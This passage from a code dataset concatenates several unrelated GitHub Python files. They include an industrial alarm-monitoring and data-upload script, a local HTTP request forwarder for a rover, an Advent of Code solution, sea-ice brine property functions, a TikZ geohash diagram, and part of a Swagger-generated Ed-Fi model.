cur.execute(sql_update_query, data)\n \n except Exception as e:\n logger.error('Modulo: \"send_to_db - \"', e)\n\n finally:\n conn.commit()\n conn.close() \n\nclass buffer():\n def __init__(self, device):\n self.internal_name = device['internal_name']\n \n \"\"\"Carga token desde DB\"\"\"\n buffer_query = f\"SELECT token FROM equipos_equipo WHERE internal_name = '{self.internal_name}'\"\n lectura_db = read_from_db(DB,buffer_query)[0]\n self.token = lectura_db.get('token')\n HEADER = {\n 'Content-Type': 'application/json',\n 'x-filename': self.internal_name + '_buffer.json',\n 'Authorization': self.token}\n\n URL = 'https://online.wonderware.com/apis/upload/datasource' \n \n while True:\n pila_buffer = q_persistente(path=f'./buffer/{self.internal_name}',multithreading=True)\n if pila_buffer.qsize() > 0:\n string_pila = pila_buffer.get()\n try:\n json_pila = json.dumps(string_pila,indent=4)\n data = '{\"data\": '+ json_pila + ' }'\n #Request de envio a Aveva; \n request_response = requests.request(\"POST\", url=URL, headers=HEADER, data=data, timeout=3)\n if request_response:\n logger.info(f'{self.internal_name} - Enviando Buffer de datos temporales guardados: ... {str(request_response.status_code)}')\n except Exception as ex:\n test_internet=chk_internet_socket()\n test_aveva = chk_internet_socket(host= URL, url_or_ip='url')\n update_global_status_values(internet = test_internet, aveva=test_aveva)\n logger.error(f\"Class buffer() -- {self.internal_name} - Error de Timeout o conexión con servidor en envio de Buffer. Se reintentara...\\n{ex}\")\n pila_buffer.put(string_pila)\n pila_buffer.task_done() \n time.sleep(10)\n\nclass leer_alarmas():\n def __init__(self, dicc_leido, internal_name, control):\n #control=\"GCP2\" # solo test GCP2\n try:\n if control==\"PCC3300\":\n detalle_alarmas = self.leer_alarmas_PCC3300(dicc_leido = dicc_leido, internal_name = internal_name) \n else:\n detalle_alarmas = self.leer_alarmas_GCP2(dicc_leido = dicc_leido, internal_name = internal_name)\n\n self.insertar_en_db(detalle_alarmas = detalle_alarmas, internal_name = internal_name) \n\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas.__init__\" - ', e) \n\n def leer_alarmas_PCC3300(self, dicc_leido, internal_name):\n try:\n rango=[400,471]\n detalle_alarmas=self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango, control= \"PCC3300\")\n return detalle_alarmas\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_PCC3300\" - ', e)\n\n def leer_alarmas_GCP2(self, dicc_leido, internal_name ):\n try: \n rango_bits_1 = [568,570]\n rango_bits_2 = [584,587]\n rango_words = [572,575]\n detalle_alarmas=[]\n detalle_alarmas=self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_bits_1, control= \"GCP2\")\n detalle_alarmas.extend(self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_bits_2, control= \"GCP2\"))\n detalle_alarmas.extend(self.leer_alarmas_words(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_words, control = \"GCP2\"))\n return detalle_alarmas\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_GCP2\" - ', e)\n\n def leer_alarmas_bits(self, dicc_leido, internal_name, rango, control):\n try:\n inicio_grupo,fin_grupo = rango\n alarmas_leidas={}\n for key in range(inicio_grupo,fin_grupo):\n alarmas_leidas[key]=dicc_leido[key]\n alarmas_activas={}\n for key, valor in alarmas_leidas.items():\n if valor > 0:\n lista_bits = [int(d) for d in str(bin(valor))[2:]] # convercion binario en lista.\n alarmas_activas[key]=lista_bits # direccion (ej.: {40400,12}) \n lista_bits=[]\n self.detalle_alarmas_bits=[]\n for key,lista_de_bits in alarmas_activas.items():\n bit=len(lista_de_bits)-1\n parametros=None\n for bit_en_lista in lista_de_bits:\n parametros=key,bit\n if bit_en_lista==1: \n self.detalle_alarmas_bits.extend(self.seleccion_lista_alarmas(parametros=parametros, tipo = \"bits\", control= control))\n bit=bit-1 \n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_bits\" - ', e)\n\n return self.detalle_alarmas_bits\n\n def leer_alarmas_words(self, dicc_leido, internal_name, control, rango):\n try:\n inicio_grupo,fin_grupo = rango\n alarmas_leidas={}\n detalle_alarmas_words=[]\n for key in range(inicio_grupo,fin_grupo):\n alarmas_leidas[key]=dicc_leido[key]\n if alarmas_leidas[key] > 0: \n parametros=key,alarmas_leidas[key]\n detalle_alarmas_words.extend(self.seleccion_lista_alarmas(parametros=parametros, tipo = \"words\", control = \"GCP2\"))\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_words\" - ', e)\n\n return detalle_alarmas_words \n\n def seleccion_lista_alarmas(self, parametros, tipo, control):#engine_model, control): #Selecciona tipo de configuracion segun tipo de control\n try:\n conn=sqlite3.connect('./db.sqlite3')\n cursor=conn.cursor()\n if tipo == \"bits\":\n address,bit=parametros\n if control == \"PCC3300\":\n sql_select_query= f'SELECT code, name, response FROM alarmas3300 WHERE address={address} and bit={bit}'\n else:\n sql_select_query= f'SELECT code, name, response FROM alarmas_gcp_bits WHERE address={address} and bit={bit}'\n\n if tipo == \"words\":\n address, word= parametros\n sql_select_query= f'SELECT code, name, response FROM alarmas_gcp_palabras WHERE address={address} and word={word}'\n \n cursor.execute(sql_select_query)\n datos= cursor.fetchall()\n return datos \n except Exception as e:\n logger.error('Modulo: \"seleccion_lista_alarmas\" - ', e)\n finally:\n conn.commit()\n conn.close()\n\n def insertar_en_db(self, detalle_alarmas, internal_name):\n try:\n \n conn=sqlite3.connect(DB)\n cursor=conn.cursor()\n data=detalle_alarmas\n \n fecha = datetime.datetime.utcnow().strftime(('%d-%m-%Y'))\n hora = datetime.datetime.utcnow().time().isoformat(timespec='seconds')\n \n for alarma in data:\n code=alarma[0] \n verificacion_code_query=f\"\"\"SELECT EXISTS(SELECT 1 FROM equipos_alarma WHERE code={code} AND internal_name='{internal_name}')\"\"\"\n cursor.execute(verificacion_code_query) \n existe_code=cursor.fetchall()[0][0]\n \n\n if existe_code==0: # Si no existe la alarma la agrega al listado\n list_alarma=list(alarma)\n list_alarma.extend([internal_name,fecha,hora,1,0,0])\n alarma=tuple(list_alarma)\n query=\"INSERT INTO equipos_alarma (code,name,response,internal_name,fecha,hora,activa,aceptada,a_eliminar) VALUES(?,?,?,?,?,?,?,?,?)\"\n cursor.execute(query,alarma)\n else:\n aceptada_query=f\"\"\"SELECT aceptada FROM equipos_alarma WHERE code={code} AND internal_name='{internal_name}'\"\"\"\n cursor.execute(aceptada_query)\n esta_aceptada = cursor.fetchall()[0][0]\n if esta_aceptada == 1:\n query=f'UPDATE equipos_alarma SET activa=1'\n else:\n query=f'UPDATE equipos_alarma SET fecha=\"{fecha}\", hora=\"{hora}\", activa=1 WHERE code={code} AND internal_name=\"{internal_name}\"'\n cursor.execute(query)\n\n except Exception as e:\n logger.error('Modulo: \"insertar_en_db\" - ', e)\n\n finally:\n conn.commit()\n conn.close()\n \ndef main(): \n try:\n update_global_status_values(False,False)\n \n #Carga conf. inicial y prepara DB\n initial_config = load_initial_configuration() \n logger.info('Carga de configuración inicial....')\n set_DB(initial_configuration=initial_config)\n \n with futures.ThreadPoolExecutor() as main_executor:\n future_internet_test = main_executor.submit(internet_test)\n future_buffer = main_executor.map(buffer,initial_config)\n future_lectura = main_executor.map(lectura_equipo,initial_config)\n \n \n except Exception as e: \n logger.error('Main --- ', e)\n\nif __name__=='__main__':\n main()\n ","repo_name":"hadellacella/siempre2","sub_path":"AUX_INFO/siempre_viejo_para_test.py","file_name":"siempre_viejo_para_test.py","file_ext":"py","file_size_in_byte":32261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1506657819","text":"### SETTINGS ###\nredirect_to:str = \"10.0.0.214\"\n################\n\n\nimport socket\nimport json\nimport requests\n\n\nclass request:\n\n method:str = None\n path:str = None\n body:str = None\n headers:dict = {}\n\n @staticmethod\n def parse(full_request:str):\n ToReturn = request()\n \n # split\n parts = full_request.split(\"\\r\\n\")\n\n # get the method\n p1 = parts[0]\n loc1 = p1.index(\" \")\n tr = p1[0:loc1]\n ToReturn.method = tr\n\n # path\n p1 = parts[0]\n loc1 = p1.index(\" \")\n loc2 = p1.index(\" \", loc1 + 1)\n tr = p1[loc1+1:loc2]\n ToReturn.path = tr\n\n # body\n bs = full_request.split(\"\\r\\n\\r\\n\")\n ToReturn.body = bs[1]\n\n # headers dictionary\n #get part before body\n before_body = bs[0]\n bb_parts = before_body.split(\"\\r\\n\")\n for x in range(1, len(bb_parts)):\n this_header = bb_parts[x]\n cl = this_header.index(\":\")\n k = this_header[0:cl]\n v = this_header[cl+1:9999].strip()\n ToReturn.headers[k] = v\n\n return ToReturn\n \n\n\n# print my IP address\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\nprint(\"My local IP address: '\" + ip_address + \"'\")\nprint(\"I will redirect all network traffic to '\" + redirect_to + \"'\")\n\n# Create a socket object\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind the socket to a specific address and port\ns.bind((\"\", 80))\n\n# Listen for incoming connections\ns.listen(1)\n\nprint(\"Listening for incoming connections...\")\n\nwhile True:\n # Establish connection with client\n client, addr = s.accept()\n print(\"Connection from: \" + str(addr))\n \n # read\n r = client.recv(9999)\n req:request = request.parse(r.decode())\n\n\n\n # handle a get and post differently\n if req.method.upper() == \"POST\":\n\n # was a body included\n body:str = None\n if req.body != \"\":\n body = req.body\n else:\n\n # find the header that states the length\n body_length:int = None\n for key, value in req.headers.items():\n if key.lower() == \"content-length\":\n body_length = int(value)\n\n if body_length != None:\n bodyb = client.recv(body_length)\n body = bodyb.decode()\n\n jobj = json.loads(body)\n\n # redirect\n url = \"http://\" + redirect_to + req.path\n headers = {\"Content-Type\": \"application/json\"}\n print(\"Sending...\")\n response = requests.post(url, headers=headers, json=jobj)\n print(\"Complete!\")\n \n # Respond with what we heard back\n client.send((\"HTTP/1.0 \" + str(response.status_code) + \"\\r\\nContent-Type: application/json\\r\\n\\r\\n\" + response.content.decode()).encode())\n client.close()\n\n elif req.method.upper() == \"GET\":\n \n # redirect\n url = \"http://\" + redirect_to + req.path\n print(\"Sending...\")\n response = requests.get(url)\n print(\"Complete!\")\n\n # Respond with what we heard back\n client.send((\"HTTP/1.0 \" + str(response.status_code) + \"\\r\\nContent-Type: application/json\\r\\n\\r\\n\" + response.content.decode()).encode())\n client.close()","repo_name":"TimHanewich/mecanum-rover","sub_path":"src/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23288211728","text":"import sys\n\nsys.path.append(\"..\")\nfrom utils.utils import IntComputer, Program\n\nmem = list(map(int, open('task_1_input.txt', 'r').readline().split(',')))\n# free game hack :D\nmem[0] = 2\n\nint_comp = IntComputer()\nint_comp.add_program(Program(mem, []))\n\n# ball pos\nb_x, b_y = 0, 0\n\n# paddle pos\np_x, p_y = 0, 0\n\nwhile int_comp.programs[0].status != 0:\n int_comp.run_prog()\n status = int_comp.programs[0].status\n\n # run until status is not 2 (output)\n if status == 2:\n continue\n\n # parse output\n output = int_comp.programs[0].outputs\n instructions = [output[i : i + 3] for i in range(0, len(output), 3)]\n\n # execute instructions\n for i in instructions:\n x, y, tile = i\n\n # display score\n if x == -1 and y == 0:\n print(f'Score: {tile}')\n continue\n\n # only track ball and paddle\n # blocks are irrelevant\n\n # set paddle pos\n if tile == 3:\n p_x, p_y = (x, y)\n\n if tile == 4:\n b_x, b_y = (x, y)\n\n # provide input\n if status == 1:\n if b_x != p_x:\n int_comp.programs[0].add_input((b_x - p_x) // abs(b_x - p_x))\n else:\n int_comp.programs[0].add_input(0)\n\n # reset output\n int_comp.programs[0].reset_output()\n","repo_name":"Korred/advent_of_code_2019","sub_path":"day_13/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7635330459","text":"# finding the length of the stack using recursion\n\n# if the stack becomes empty then we have to finish counting\n\n\ndef is_empty(stack):\n try:\n stack.pop()\n print(\"Not True\")\n except IndexError:\n return True\n\ncount = 1\ndef leng(stack):\n if is_empty(stack) == True:\n return\n\n else:\n global count\n count = count + 1\n stack.pop()\n return leng(stack) \n\n\nl = [10,20]\nleng(l)\nprint(count)\n\nl = [10,20,30]\nprint(type(l.pop()))\nprint(l)\nl.pop()\nprint(l)","repo_name":"raghavnarula/Data-Structures","sub_path":"Stacks Data Structures/lengthOfstack.py","file_name":"lengthOfstack.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9171167046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCollection of subfunctions related to brine parameters: Brine salinity, \nbrine conductivity, brine volumen etc.\n\n@author: mwi\n\"\"\"\nimport numpy as np\n\ndef salinity(T,method='Assur'):\n \"\"\"\n Brine salinity as function of temperature.\n Empirical expression from Assur (1960) and Poe et al (1972).\n Version from Ulaby et al, 1986 (E63). Valid range: -43.2oC--1.8oC.\n \n [sal] = salinity(T,method)\n sal: Salinity [psu (or o/oo)]\n T: Temperature [K]\n method: 'Assur' (default), 'unknown'\n \"\"\"\n # Temperature in oC:\n Tc = T-273.15 \n \n # Salinity:\n sal = np.ones(len(Tc))\n \n if method == 'Assur':\n mask = (Tc>=-1.8) # Using Tc=-1.8oC (not 2oC) to ensure continuity of salinity to value of 34.2o/oo. \n sal[mask]=34.2 # Constant level above -1.8oC\n \n mask = (Tc<-1.8) & (Tc>=-8.2)\n sal[mask]=1.725-18.756*Tc[mask]-0.3964*Tc[mask]**2\n \n mask = (Tc<-8.2) & (Tc>=-22.9)\n sal[mask]=57.041-9.929*Tc[mask]-0.16204*Tc[mask]**2-0.002396*Tc[mask]**3\n \n mask = (Tc<-22.9) & (Tc>=-36.8)\n sal[mask]=242.94+1.5299*Tc[mask]+0.0429*Tc[mask]**2\n \n mask = (Tc<-36.8) & (Tc>=-43.2)\n sal[mask]=508.18+14.535*Tc[mask]+0.2018*Tc[mask]**2\n \n # Constant level for temperatures below -43.2oC:\n mask = (Tc<-43.2)\n sal[mask]=508.18+14.535*-43.2+0.2018*((-43.2)**2) \n \n elif method == 'unknown':\n sal[T>=0] = 0\n \n mask = (Tc<0) & (Tc>=-8)\n sal[mask]= 1./(0.001-0.05411/Tc[mask]) \n \n mask = (Tc<-8) & (Tc>=-22.9)\n sal[mask] = -1.20 - 21.8*Tc[mask] - 0.919*Tc[mask]**2 - 0.0178*Tc[mask]**3\n \n mask = (Tc<-22.9) & (Tc>=-36.8)\n sal[mask]=242.94+1.5299*Tc[mask]+0.0429*Tc[mask]**2\n \n mask = (Tc<-36.8) & (Tc>=-43.2)\n sal[mask]=508.18+14.535*Tc[mask]+0.2018*Tc[mask]**2\n \n # Constant level for temperatures below -43.2oC:\n mask = (Tc<-43.2)\n sal[mask]=508.18+14.535*-43.2+0.2018*((-43.2)**2) \n return sal\n\ndef normality(sal):\n \"\"\"\n Normality of brine solution. \n \n [N] = normality(sal)\n N: Normality [unit?]\n sal: Salinity [psu]\n \"\"\"\n \n # Normality of brine solution:\n N = 0.9141*sal* (1.707e-2 + 1.205e-5*sal + 4.058e-9*sal**2)\n return N \n \ndef conductivity(T,sal,method='StogrynDesargant1985'):\n \"\"\"\n Ionic conductivity of brine as function of brine temperature and salinity. \n Version from Ulaby et al, 1986 (E20). Valid range: -43.2oC--1.8oC.\n Note that this version is somewhat different from what is given by Stogryn \n and Desargant, 1985, which is calculated based on temperature only. \n \n [cond, N] = conductivity(T,N)\n cond: Brine conductivity [in S/m?]\n N: Normality\n T: Temperature [K]\n sal: Salinity [psu]\n method: 'Stogryn1971', 'StogrynDesargant1985' (default)\n \"\"\" \n # Temperature in oC:\n Tc = T-273.15\n \n if method == 'Stogryn1971':\n # Normality of brine solution:\n N = normality(sal)\n \n # Conductivity:\n D = 25-Tc\n sig = N* (10.39-2.378*N+0.683*(N**2)-0.135*N**3+1.01e-2*N**4)\n c = 1.0 - 1.96e-2*D + 8.08e-5*(D**2) - N*D*(3.02e-5+3.92e-5*D + N*(1.72e-5 - 6.58e-6*D))\n cond=c*sig\n \n elif method == 'StogrynDesargant1985':\n # Alternative solution from Stogryn and Desargant, 1985, Eq.7:\n cond=np.zeros(len(Tc))\n mask = (Tc>=-22.9)\n cond[mask] = -Tc[mask]*np.exp(0.5193 + 0.8755*0.1*Tc[mask])\n cond[~mask] = -Tc[~mask]*np.exp(1.0334 + 0.1100*Tc[~mask])\n \n # Calculated normality is not required:\n N = None\n \n # Always positive:\n cond = np.clip(cond,0,None) \n return cond, N\n\ndef volume(T,sal,method='Frankenstein'):\n \"\"\"\n Volumen fraction of brine in sea ice.\n volbrine = volume(T,sal)\n volbrine: Volumen fraction of brine\n T: Temperature [K]\n sal: Sea ice salinity [o/oo, or psu, or ppt] \n method: 'Frankenstein' (default), 'Frankenstein_simple', 'original'\n \"\"\" \n # Temperature in oC:\n Tc = T-273.15\n\n # From Ulaby et al, 1986, E71, and Ulaby p. 136, E4.51\n # Empirical expression from Frankenstein and Garner (1967): \n # Applicable for the temperature range: -22.9oC- -0.5oC \n if method == 'Frankenstein_simple':\n volbrine = np.zeros(len(Tc))\n mask = (Tc<-0.1)\n volbrine[mask] = 0.001*sal[mask]*((-49.185/Tc[mask])+0.532) \n\n # Frankenstein equation cannot be calculated for Tc=0oC.\n # Using a different relationship for temperatures above -0.1oC:\n volbrine[~mask] = 0.001*sal[~mask]*9.717 # Not sure where this one comes from\n \n if method == 'Frankenstein':\n # Equations taken from Ulaby's old book, p. 2048:\n volbrine = np.zeros(len(Tc))\n mask = (Tc>-0.5)\n volbrine[mask] = 0.001*sal[mask]*9.717 # Not sure where this one comes from\n mask = (Tc<=-0.5) & (Tc>-2.06)\n volbrine[mask] = 0.001*sal[mask]*(-52.56/Tc[mask]-2.28)\n mask = (Tc<=-2.06) & (Tc>-8.2)\n volbrine[mask] = 0.001*sal[mask]*(-45.917/Tc[mask]+0.93)\n mask = (Tc<=-8.2) & (Tc>=-22.9)\n volbrine[mask] = 0.001*sal[mask]*(-43.795/Tc[mask]+1.189)\n mask = (Tc<-22.9)\n volbrine[mask] = 0.001*sal[mask]*(-43.795/(-22.9)+1.189)\n \n elif method == 'original':\n sal_brine = salinity(T)\n volbrine = sal/sal_brine #*rho_ice/rho_brine \n # rho_brine is also temperature dependent, but much weaker than sal_brine. \n # Calculated values may be some factor off the true values??\n \n volbrine = np.clip(volbrine,0,1)\n return volbrine","repo_name":"PKUliubaojian/TDS_model","sub_path":"Python/brine.py","file_name":"brine.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"15851663765","text":"from fathom import Point, ORIGIN\nfrom fathom.tikz import Canvas\nfrom fathom.geometry import *\nimport fathom.layout as layout\nimport fathom.tikz.colors as colors\nimport fathom.tikz.line_styles as line_styles\nimport fathom.tikz.locations as locations\nfrom itertools import *\n\ndef upside_down(p):\n return Point(p.x, -p.y)\n\ndef drop(xs, n):\n for _ in range(n):\n next(xs)\n for x in xs:\n yield x\n\ndef fraction(canvas, center, value, text_color):\n SEG_NUM = 3\n SEG_W = 0.2\n SEG_H = 0.4\n\n ts = repeat((value, 1, 0))\n ts = accumulate(\n ts,\n lambda x, _:\n (x[0], x[1] / 2, 0) if x[0] < x[1] else \\\n (x[0] - x[1], x[1] / 2, 1))\n ts = drop(ts, 2)\n ts = ('{}'.format(x) for _, _, x in ts)\n\n rs = repeat(center + Point(-SEG_W * (SEG_NUM - 1) / 2, 0))\n rs = accumulate(rs, lambda x, _: x + Point(SEG_W, 0))\n rs = (Rectangle(center=x, width=SEG_W, height=SEG_H) for x in rs)\n rs = islice(rs, SEG_NUM)\n rs = list(rs)\n\n canvas.new_text(\n anchor=centroid([rs[0].vertices()[0],\n rs[0].vertices()[3]]),\n text='0.',\n location=locations.WEST)\n\n res = list(zip(rs, ts))\n for r, t in res:\n canvas.new_text(\n anchor=r.center(),\n text=t,\n pen_color=text_color)\n\n canvas.new_rectangle(\n vertices=[rs[0].vertices()[0],\n rs[-1].vertices()[1],\n rs[-1].vertices()[2],\n rs[0].vertices()[3]])\n for x in rs[1:]:\n canvas.new_line(src=x.vertices()[0], dst=x.vertices()[3])\n\n return res\n\ndef draw_root(canvas, center, left, right):\n SEG_W = 0.2\n SEG_H = 0.4\n n = len(left) + len(right)\n segs = repeat(center + Point(-SEG_W * (n - 1) / 2, 0))\n segs = accumulate(segs, lambda x, _: x + Point(SEG_W, 0))\n segs = (Rectangle(\n center=x,\n width=SEG_W,\n height=SEG_H) \\\n for x in segs)\n segs = list(islice(segs, n))\n\n src = chain(\n ((i * 2, colors.BLUE, x) for i, x in enumerate(left)),\n ((i * 2 + 1, colors.ORANGE, x) for i, x in enumerate(right)))\n for i, c, (r, t) in src:\n d = segs[i]\n canvas.new_text(anchor=d.center(), text=t, pen_color=c)\n canvas.new_arrow(\n src=centroid([r.vertices()[2], r.vertices()[3]]),\n dst=centroid([d.vertices()[0], d.vertices()[1]]))\n\n canvas.new_rectangle(\n vertices=[segs[0].vertices()[0],\n segs[-1].vertices()[1],\n segs[-1].vertices()[2],\n segs[0].vertices()[3]])\n for x in segs[1:]:\n canvas.new_line(\n src=x.vertices()[0],\n dst=x.vertices()[3])\n\nif __name__ == '__main__':\n tree = layout.tree(\n ['root',\n ['left', ['left_up']],\n ['right', ['right_up']]],\n root=ORIGIN,\n h_sep=2,\n v_sep=1.3)\n for k, v in tree.copy().items():\n tree[k] = upside_down(v)\n\n canvas = Canvas(\n preamble=['\\\\usepackage{amsmath}'],\n leading_instructions=['\\\\footnotesize'])\n\n canvas.new_text(anchor=tree['left_up'], text='$121^\\\\circ$E')\n left_up = canvas.new_rectangle(\n center=tree['left_up'],\n width=1,\n height=0.4,\n pen_color=colors.INVISIBLE)\n left = fraction(canvas, tree['left'], (180 + 121) / 360, colors.BLUE)\n canvas.new_arrow(\n src=left_up,\n dst=centroid([left[1][0].vertices()[0], left[1][0].vertices()[1]]))\n\n canvas.new_text(anchor=tree['right_up'], text='$31^\\\\circ$N')\n right_up = canvas.new_rectangle(\n center=tree['right_up'],\n width=1,\n height=0.4,\n pen_color=colors.INVISIBLE)\n right = fraction(canvas, tree['right'], (31 + 90) / 180, colors.ORANGE)\n canvas.new_arrow(\n src=right_up,\n dst=centroid([right[1][0].vertices()[0], right[1][0].vertices()[1]]))\n\n draw_root(canvas, tree['root'], left, right)\n\n print(canvas.draw())\n","repo_name":"TimeExceed/modern_db_part0","sub_path":"figs/geohash.py","file_name":"geohash.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"7808986018","text":"# coding: utf-8\n\n\"\"\"\n Ed-Fi Operational Data Store API\n\n The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501\n\n OpenAPI spec version: 3\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass EdFiAcademicWeek(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'week_identifier': 'str',\n 'school_reference': 'EdFiSchoolReference',\n 'begin_date': 'date',\n 'end_date': 'date',\n 'total_instructional_days': 'int',\n 'etag': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'week_identifier': 'weekIdentifier',\n 'school_reference': 'schoolReference',\n 'begin_date': 'beginDate',\n 'end_date': 'endDate',\n 'total_instructional_days': 'totalInstructionalDays',\n 'etag': '_etag'\n }\n\n def __init__(self, id=None, week_identifier=None, school_reference=None, begin_date=None, end_date=None, total_instructional_days=None, etag=None, _configuration=None): # noqa: E501\n \"\"\"EdFiAcademicWeek - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._id = None\n self._week_identifier = None\n self._school_reference = None\n self._begin_date = None\n self._end_date = None\n self._total_instructional_days = None\n self._etag = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n self.week_identifier = week_identifier\n self.school_reference = school_reference\n self.begin_date = begin_date\n self.end_date = end_date\n self.total_instructional_days = total_instructional_days\n if etag is not None:\n self.etag = etag\n\n @property\n def id(self):\n \"\"\"Gets the id of this EdFiAcademicWeek. # noqa: E501\n\n # noqa: E501\n\n :return: The id of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this EdFiAcademicWeek.\n\n # noqa: E501\n\n :param id: The id of this EdFiAcademicWeek. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def week_identifier(self):\n \"\"\"Gets the week_identifier of this EdFiAcademicWeek. # noqa: E501\n\n The school label for the week. # noqa: E501\n\n :return: The week_identifier of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._week_identifier\n\n @week_identifier.setter\n def week_identifier(self, week_identifier):\n \"\"\"Sets the week_identifier of this EdFiAcademicWeek.\n\n The school label for the week. # noqa: E501\n\n :param week_identifier: The week_identifier of this EdFiAcademicWeek. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and week_identifier is None:\n raise ValueError(\"Invalid value for `week_identifier`, must not be `None`\") # noqa: E501\n if (self._configuration.client_side_validation and\n week_identifier is not None and len(week_identifier) > 80):\n raise ValueError(\"Invalid value for `week_identifier`, length must be less than or equal to `80`\") # noqa: E501\n\n self._week_identifier = week_identifier\n\n @property\n def school_reference(self):\n \"\"\"Gets the school_reference of this EdFiAcademicWeek. # noqa: E501\n\n\n :return: The school_reference of this EdFiAcademicWeek. # noqa: E501\n :rtype: EdFiSchoolReference\n \"\"\"\n return self._school_reference\n\n @school_reference.setter\n def school_reference(self, school_reference):\n \"\"\"Sets the school_reference of this EdFiAcademicWeek.\n\n\n :param school_reference: The school_reference of this EdFiAcademicWeek. # noqa: E501\n :type: EdFiSchoolReference\n \"\"\"\n if self._configuration.client_side_validation and school_reference is None:\n raise ValueError(\"Invalid value for `school_reference`, must not be `None`\") # noqa: E501\n\n self._school_reference = school_reference\n\n @property\n def begin_date(self):\n \"\"\"Gets the begin_date of this EdFiAcademicWeek. # noqa: E501\n\n The start date for the academic week. # noqa: E501\n\n :return: The begin_date of this EdFiAcademicWeek. # noqa: E501\n :rtype: date\n \"\"\"\n return self._begin_date\n\n @begin_date.setter\n def begin_date(self, begin_date):\n \"\"\"Sets the begin_date of this EdFiAcademicWeek.\n\n The start date for the academic week. # noqa: E501\n\n :param begin_date: The begin_date of this EdFiAcademicWeek. # noqa: E501\n :type: date\n \"\"\"\n if self._configuration.client_side_validation and begin_date is None:\n raise ValueError(\"Invalid value for `begin_date`, must not be `None`\") # noqa: E501\n\n self._begin_date = begin_date\n\n @property\n def end_date(self):\n \"\"\"Gets the end_date of this EdFiAcademicWeek. # noqa: E501\n\n The end date for the academic week. # noqa: E501\n\n :return: The end_date of this EdFiAcademicWeek. # noqa: E501\n :rtype: date\n \"\"\"\n return self._end_date\n\n @end_date.setter\n def end_date(self, end_date):\n \"\"\"Sets the end_date of this EdFiAcademicWeek.\n\n The end date for the academic week. # noqa: E501\n\n :param end_date: The end_date of this EdFiAcademicWeek. # noqa: E501\n :type: date\n \"\"\"\n if self._configuration.client_side_validation and end_date is None:\n raise ValueError(\"Invalid value for `end_date`, must not be `None`\") # noqa: E501\n\n self._end_date = end_date\n\n @property\n def total_instructional_days(self):\n \"\"\"Gets the total_instructional_days of this EdFiAcademicWeek. # noqa: E501\n\n The total instructional days during the academic week. # noqa: E501\n\n :return: The total_instructional_days of this EdFiAcademicWeek. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_instructional_days\n\n @total_instructional_days.setter\n def total_instructional_days(self, total_instructional_days):\n \"\"\"Sets the total_instructional_days of this EdFiAcademicWeek.\n\n The total instructional days during the academic week. # noqa: E501\n\n :param total_instructional_days: The total_instructional_days of this EdFiAcademicWeek. # noqa: E501\n :type: int\n \"\"\"\n if self._configuration.client_side_validation and total_instructional_days is None:\n raise ValueError(\"Invalid value for `total_instructional_days`, must not be `None`\") # noqa: E501\n\n self._total_instructional_days = total_instructional_days\n\n @property\n def etag(self):\n \"\"\"Gets the etag of this EdFiAcademicWeek. # noqa: E501\n\n A unique system-generated value that identifies the version of the resource. # noqa: E501\n\n :return: The etag of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._etag\n\n @etag.setter\n def etag(self, etag):\n \"\"\"Sets the etag of this EdFiAcademicWeek.\n\n A unique system-generated value that identifies the version of the resource. # noqa: E501\n\n :param etag: The etag of this EdFiAcademicWeek. # noqa: E501\n :type: str\n \"\"\"\n\n self._etag = etag\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n 